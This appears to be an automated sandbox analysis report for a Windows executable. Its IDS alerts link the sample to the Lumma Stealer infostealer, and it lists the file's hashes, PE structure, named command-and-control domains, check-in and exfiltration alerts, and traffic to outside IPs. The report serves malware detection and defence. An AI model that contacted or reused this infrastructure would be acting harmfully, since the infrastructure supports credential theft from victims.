                                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.8.<./.P.i.d.

                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB93A.tmp.xml

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4623
                                                                                                                                                                                                                                                              Entropy (8bit):4.50296389532311
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsrJg77aI9uZWpW8VYwYm8M4JhK1OqFsla+q8MX2OWELQuzKydd:uIjfFI7go7VsJA4lawRE8uzKydd
                                                                                                                                                                                                                                                              MD5:34BC39FDC78048BE2FB80409E60C333E
                                                                                                                                                                                                                                                              SHA1:F135725F6390E787F3E877A1B26DFAB34465605E
                                                                                                                                                                                                                                                              SHA-256:FD2490205CB2F47ADBF8C3F87DEC12A2EE1CDE8E95DCDF53BD1145F6142B46BD
                                                                                                                                                                                                                                                              SHA-512:BE9E80CBE205468D5A9C357A5C6F09EE71D5C24A53698E38AED25A6253CE24C23355FF8A334384F9CCE9BCE0CE953CE217C6D229E5B9C56A9B48D9114EB70044
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="648180" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                                                              Entropy (8bit):4.372087855371399
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:/FVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNMiL:tV1QyWWI/glMM6kF7Cq
                                                                                                                                                                                                                                                              MD5:745A8435A0174796E545702F9E9B43B3
                                                                                                                                                                                                                                                              SHA1:BE411CD981BDBB187F98F050FDD623DA7FAC7B3D
                                                                                                                                                                                                                                                              SHA-256:717AB866D530B0B0C6822587CCE5A0B2DED8347DE937D2EA9208A1A6DA1EEA45
                                                                                                                                                                                                                                                              SHA-512:DF71120F671E4444695E438C0BDAF1681B9CBBA6DCDDAC60EF1AE810EAFC954E38F660693AB120A3ED65A06ADF363F05D3CF3485989A7296454181839171422A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...T.W.................................................................................................................................................................................................................................................................................................................................................`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):7.325926955203994
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                                                                                                                                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:SPFFah2O2q.exe
                                                                                                                                                                                                                                                              File size:316'928 bytes
                                                                                                                                                                                                                                                              MD5:d4d4b5b6ca79bb5b57e8ef3791629e47
                                                                                                                                                                                                                                                              SHA1:6b8a0d8b88456527484a3eed58f249131d74f436
                                                                                                                                                                                                                                                              SHA256:764ee0242a1a188052d65038c3967ceef1cc0554243bc60412d0d5a85064d053
                                                                                                                                                                                                                                                              SHA512:48950469edbd1a7f68740122dcf4ddfd7b5a78ed4642cee7f1d83318dad230f82432a5cf199052529fb075e39b8fa9bec55b6ff77c2557e1724f6202b4688f8f
                                                                                                                                                                                                                                                              SSDEEP:6144:fdEontYO7NQ29rG80/HS0RdoNOURamcjM:fCMtRVt4HjRKNOUUE
                                                                                                                                                                                                                                                              TLSH:3964F122B642D47AC44B50705C62FFA0AB7F7C315AB9884737682B6E5E702D1973B31B
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\QG..0)..0)..0)..b..20)..b..=0)..b...0).?.R..0)..0(.b0)..b...0)..b...0)..b...0).Rich.0).........PE..L......f...................

                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                              Icon Hash:63796de171436e0f

                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Entrypoint:0x407276
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x66079EDC [Sat Mar 30 05:10:52 2024 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:a7dc7db11c4c985cfc70cf6b0849448d

                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              call 00007FD230703736h
                                                                                                                                                                                                                                                              jmp 00007FD2306FD74Dh
                                                                                                                                                                                                                                                              call 00007FD2306FD90Ch
                                                                                                                                                                                                                                                              xchg cl, ch
                                                                                                                                                                                                                                                              jmp 00007FD2306FD8F4h
                                                                                                                                                                                                                                                              call 00007FD2306FD903h
                                                                                                                                                                                                                                                              fxch st(0), st(1)
                                                                                                                                                                                                                                                              jmp 00007FD2306FD8EBh
                                                                                                                                                                                                                                                              fabs
                                                                                                                                                                                                                                                              fld1
                                                                                                                                                                                                                                                              mov ch, cl
                                                                                                                                                                                                                                                              xor cl, cl
                                                                                                                                                                                                                                                              jmp 00007FD2306FD8E1h
                                                                                                                                                                                                                                                              mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                                                                                                                              fabs
                                                                                                                                                                                                                                                              fxch st(0), st(1)
                                                                                                                                                                                                                                                              fabs
                                                                                                                                                                                                                                                              fxch st(0), st(1)
                                                                                                                                                                                                                                                              fpatan
                                                                                                                                                                                                                                                              or cl, cl
                                                                                                                                                                                                                                                              je 00007FD2306FD8D6h
                                                                                                                                                                                                                                                              fldpi
                                                                                                                                                                                                                                                              fsubrp st(1), st(0)
                                                                                                                                                                                                                                                              or ch, ch
                                                                                                                                                                                                                                                              je 00007FD2306FD8D4h
                                                                                                                                                                                                                                                              fchs
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              fabs
                                                                                                                                                                                                                                                              fld st(0), st(0)
                                                                                                                                                                                                                                                              fld st(0), st(0)
                                                                                                                                                                                                                                                              fld1
                                                                                                                                                                                                                                                              fsubrp st(1), st(0)
                                                                                                                                                                                                                                                              fxch st(0), st(1)
                                                                                                                                                                                                                                                              fld1
                                                                                                                                                                                                                                                              faddp st(1), st(0)
                                                                                                                                                                                                                                                              fmulp st(1), st(0)
                                                                                                                                                                                                                                                              ftst
                                                                                                                                                                                                                                                              wait
                                                                                                                                                                                                                                                              fstsw word ptr [ebp-000000A0h]
                                                                                                                                                                                                                                                              wait
                                                                                                                                                                                                                                                              test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                                                                                                                              jne 00007FD2306FD8D7h
                                                                                                                                                                                                                                                              xor ch, ch
                                                                                                                                                                                                                                                              fsqrt
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              pop eax
                                                                                                                                                                                                                                                              jmp 00007FD2306FE0EFh
                                                                                                                                                                                                                                                              fstp st(0)
                                                                                                                                                                                                                                                              fld tbyte ptr [004441FAh]
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              fstp st(0)
                                                                                                                                                                                                                                                              or cl, cl
                                                                                                                                                                                                                                                              je 00007FD2306FD8DDh
                                                                                                                                                                                                                                                              fstp st(0)
                                                                                                                                                                                                                                                              fldpi
                                                                                                                                                                                                                                                              or ch, ch
                                                                                                                                                                                                                                                              je 00007FD2306FD8D4h
                                                                                                                                                                                                                                                              fchs
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              fstp st(0)
                                                                                                                                                                                                                                                              fldz
                                                                                                                                                                                                                                                              or ch, ch
                                                                                                                                                                                                                                                              je 00007FD2306FD8C9h
                                                                                                                                                                                                                                                              fchs
                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                              fstp st(0)
                                                                                                                                                                                                                                                              jmp 00007FD2306FE0C5h
                                                                                                                                                                                                                                                              fstp st(0)
                                                                                                                                                                                                                                                              mov cl, ch
                                                                                                                                                                                                                                                              jmp 00007FD2306FD8D2h
                                                                                                                                                                                                                                                              call 00007FD2306FD89Eh
                                                                                                                                                                                                                                                              jmp 00007FD2306FE0D0h
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                                                              add esp, FFFFFD30h
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              wait
                                                                                                                                                                                                                                                              fstcw word ptr [ebp+0000005Ch]

                                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                              • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                              • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                              • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                              • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x433fc0x50.text
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x3f50.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x51000x40.text
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x190.text
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              .text0x10000x42d380x42e002053a0c62c4f3579b9663862f90a17e3False0.8494341413551402data7.746542950910192IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .data0x440000xae080x6400dde01b78c2baa927b7633aaa7ae77058False0.0894921875dBase III DBT, next free block index 7565155, 1st item "\017\311\377?"1.0754787329615867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0x4f0000x6f500x4000879b254da438f4897cd5f70f78339970False0.42529296875data3.995212372684333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_CURSOR0x523f80x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                                                                                                                                                                                              RT_CURSOR0x527280x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                                                                                                                                                                                                              RT_ICON0x4f2a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.5282258064516129
                                                                                                                                                                                                                                                              RT_ICON0x4f9680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.41203319502074687
                                                                                                                                                                                                                                                              RT_ICON0x51f100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.44680851063829785
                                                                                                                                                                                                                                                              RT_STRING0x52ab80x496dataRomanianRomania0.4454855195911414
                                                                                                                                                                                                                                                              RT_ACCELERATOR0x523a80x50dataRomanianRomania0.825
                                                                                                                                                                                                                                                              RT_GROUP_CURSOR0x528580x22data1.0294117647058822
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x523780x30dataRomanianRomania0.9375
                                                                                                                                                                                                                                                              RT_VERSION0x528800x234data0.5336879432624113

                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              KERNEL32.dllEnumCalendarInfoA, WriteConsoleInputW, InterlockedIncrement, GetCurrentProcess, InterlockedCompareExchange, FindNextVolumeMountPointA, EscapeCommFunction, GetWindowsDirectoryA, EnumTimeFormatsW, CopyFileW, GetConsoleAliasExesLengthW, CreateSemaphoreA, SetComputerNameExW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, SetCalendarInfoW, OpenEventA, GlobalUnWire, GetModuleHandleA, FreeEnvironmentStringsW, EnumDateFormatsW, GetVersionExA, ReadConsoleInputW, TerminateJobObject, GetCurrentProcessId, EnumCalendarInfoExA, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, IsDebuggerPresent, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapFree, WriteFile, GetModuleFileNameA, SetFilePointer, HeapCreate, VirtualFree, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
                                                                                                                                                                                                                                                              SHELL32.dllDragQueryPoint
                                                                                                                                                                                                                                                              ole32.dllCoRegisterPSClsid

                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              RomanianRomania

                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-12-26T12:57:08.211464+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.8561541.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-26T12:57:08.692867+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.8548391.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-26T12:57:09.069993+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.8644161.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-26T12:57:09.293849+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.8521961.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-26T12:57:09.692828+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.8525811.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-26T12:57:09.922659+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.8574071.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-26T12:57:10.149481+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.8585151.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-26T12:57:10.369987+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.8580181.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-26T12:57:12.779136+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84970523.55.153.106443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:13.585530+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.84970523.55.153.106443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:15.330280+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:16.092621+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849706172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:16.092621+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:17.432243+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:18.190258+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:18.190258+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:19.927100+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:20.828002+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849708172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:22.644353+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709172.67.157.254443TCP
                                                                                                                                                                                                                                                              2024-12-26T12:57:25.385903+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711172.67.157.254443TCP

                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.829267025 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.829320908 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.829440117 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.840485096 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.840497971 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:12.779052973 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:12.779135942 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:12.781810999 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:12.781821966 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:12.782145977 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:12.822258949 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:12.869947910 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:12.911341906 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585557938 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585582972 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585622072 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585644960 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585666895 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585680962 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585717916 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585741043 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.585760117 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.782573938 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.782630920 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.782669067 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.782706022 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.782753944 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813101053 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813143015 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813174009 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813195944 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813213110 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.813266993 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.835074902 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.835107088 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.835122108 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.835129023 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018224955 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018275023 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018379927 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018779993 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.018794060 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.330050945 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.330280066 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.332838058 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.332849979 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.333153009 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.338102102 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.338116884 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:15.338210106 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092619896 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092736959 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092792034 CET49706443192.168.2.8172.67.157.254
